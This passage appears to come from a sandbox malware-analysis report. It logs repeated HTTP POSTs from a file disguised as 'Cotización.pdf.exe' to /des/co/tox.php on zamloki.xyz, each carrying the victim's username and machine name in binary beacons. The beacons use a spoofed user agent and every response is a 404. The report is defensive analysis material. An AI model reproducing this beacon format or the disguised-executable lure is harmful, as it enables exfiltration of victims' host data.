                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:53.890276909 CEST5978INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:53 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=i%2FHRDNmXwedPHW6RQj9tz3ELLZvS2Gvv%2F8Bhcc6yDrPyviLOK1iCjwaEf6f%2FqjTF%2FAZLj4Y3nDe0nBWYbP0%2F8S5FMvUmXw%2FiRf36fbDvdmJwa%2BdeHR17yv0%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265eb1b4e176e-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      113192.168.2.349849172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:54.119128942 CEST5979OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:54.138875008 CEST5979OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:54.455528975 CEST5980INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:54 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=DmI8ADQq8Bxg3t%2FyKb%2B8yuJF3Rz0%2FIMKgg%2F8B8HA6NhqxR0zBKyFSAyUH%2FqTD7NlqRQZA7uscdW2bpiRqfVEVI5xSA4Z8f57DPalhhA23%2BFoXYVWIRQwmP8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265ee4e994aaa-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      114192.168.2.349850104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:54.699547052 CEST5981OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:54.717286110 CEST5981OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:54.971038103 CEST5982INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:54 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lm82ngWNWrMn2QZLJzF%2FVsOBv3mlQcnPM1W6vCJGNF8ECxdTrXm0jTfApqRZI2A6VmULdZTV9dNfuVCFH6XNu5UWcetY%2F73mcExeZ1T1SnK6IbOoorQCOIo%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265f1f92c4a67-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      115192.168.2.349851172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:55.197726011 CEST5983OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:55.217361927 CEST5983OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:55.471668959 CEST5984INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:55 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jZC474QxydPFI9%2BrS56UBJRJinetEYWIFAxcEYo9YFCvxGRRamrNRN%2FDa9GHOfSyR5nm79sL5%2B6SzCOWkqlHZnhAoi%2BqoM67V6Bk1uA2AHXqc1kZ%2B%2FfEd7k%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265f509a3d725-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      116192.168.2.349852172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:55.710877895 CEST5985OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:55.728506088 CEST5985OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:55.970537901 CEST5986INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:55 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JcAzHkX7d2IdGp3b19II0q2tW2UfpQ6qaCabv7%2Bf1VM%2FnEkW59aci9pT4xBfX9%2BvnlMY26uBYTccEgQguwyRkwaBP%2FQdUZ5gHgoEwymetS0I3%2BlqpFUWG0c4RLkRLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265f83c6d1f3d-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      117192.168.2.349853172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:56.214617014 CEST5987OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:56.234385967 CEST5987OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:56.479937077 CEST5988INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:56 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zlFavmBhp88x3XM9gFyp9eQPvTm6qaC403yd%2F6PsadY%2BuXzpNMjdtwcnvhQnOzeNKyLNGyVr2LwrTYBKVFcG0S7U%2F%2BnrTYw2EPPaif2sO0oyyk%2BUIr2Kb9Q%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265fb6d7c4e79-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      118192.168.2.349854172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:56.714370966 CEST5988OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:56.731878996 CEST5989OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:56.973958015 CEST5989INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:56 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=PIiCxF18Q%2BNcUCn%2BeVKznYvJcBglwQW8%2BVbTl9vdKXD7uAsu24s230WcNN%2Bn%2FYsWcTliZs0jRZk%2FaFmUTB%2F7vxpAalNjxFSNuj1MMKo1%2FDZeBx0owk07ezo%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265fe8958c2c7-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      119192.168.2.349855104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:57.212311029 CEST5990OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:57.232202053 CEST5991OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:57.471878052 CEST5991INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:57 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=YnicP2NK0A4iOFHeDQxzuF8zc89W7AnyJlvOPm4t8b9F0i4TsXl4NagOQEofVAAEkRv4BWd781BrGtV1nsYk1CTdsBK7B7QXgj099HvlYGM%2B7AIvK6A7jXQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26601a9974a5b-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      12192.168.2.349738104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:56.554640055 CEST1394OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:56.573070049 CEST1395OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:56.816598892 CEST1402INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:56 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eLuNkLme%2FtHJNJyhBv09vNGcOu7INlJNclKy96xY7my2xggIV7e%2BzTeUq8fgen1IUtHOr%2Bv2KsuENGKOL0mDvGABc1BjnbNf56qqYSSJEej%2Brpre8jNvQvw%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264868e0b4e49-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      120192.168.2.349856172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:57.731595039 CEST5992OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:57.752129078 CEST5992OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:58.029711008 CEST5993INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:58 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zQLmtKTDBEG9OxQ9UJxapo%2Fbc4vw1reA4M%2BC2KNhpWO%2Br4dNkOEECKcndRdvdCf953r5Ez9hmEc6yGTMCBGguowDWTgwzDMDC7EgIXJhDD7zLGZPhfnk38k%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26604e8314aa9-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      121192.168.2.349857172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:58.262469053 CEST5994OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:58.279959917 CEST5994OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:58.558218002 CEST5995INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:58 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=CM51X9tGlYPRVJjhP5npi9MSTS%2BTlv6Xo%2FFG0O1UWB7rLeN1xTMwKheOQ7NVKHy1jDpqGT4jgGLJ0AtApHgR%2B%2FL8i7yJvwOE3FmlRiU34NAp64ovkBy1cbE%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f266083b420ebb-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      122192.168.2.349858172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:58.800401926 CEST5996OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:58.819828987 CEST5996OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:59.062762022 CEST5997INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:59 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jt5p8ihYiz36%2BuIkmzJV%2Fh72jDAAhdhgV4nJ82sqY6%2BP9zfVQoB1SUNUdOKVCX9idCUbPIuCKvtFb2Mjx0iCLGX0%2FHdw2xVFkz6xR8cbl1bVEwQVNstVHWNDOWPMag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2660b9b7fdfff-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      123192.168.2.349859104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:59.313235998 CEST5998OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:59.331041098 CEST5998OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:59.592097998 CEST5999INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:59 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gJXEoeCCNpItnzvEMUlL747McdKkE7s7TDj5MU4quIBqtC8lLZLKejfpodQ94Ua36tOyCSyODgtdRalCtCwcdWgxKQQDJ2DM9HW%2Fv35ecJFmvNGddyuC%2FKs%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2660ec8410746-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      124192.168.2.349860104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:59.820403099 CEST6000OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:59.840147972 CEST6000OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:00.086410046 CEST6001INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:00 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yEtky0wd0HBVN2s%2FPysPHIogNCYkdt%2F0o3UvwqxhIlvXe%2BOQAU7Tyx4klOJBgN42JH8XyCOEX4mD3dp5eU%2BdNPDqUkq2ymjHQIi1OSN5WHkd7gdFlmoy5rHQ3ZjMOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26611fdda96b6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      125192.168.2.349861104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:00.312026978 CEST6001OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
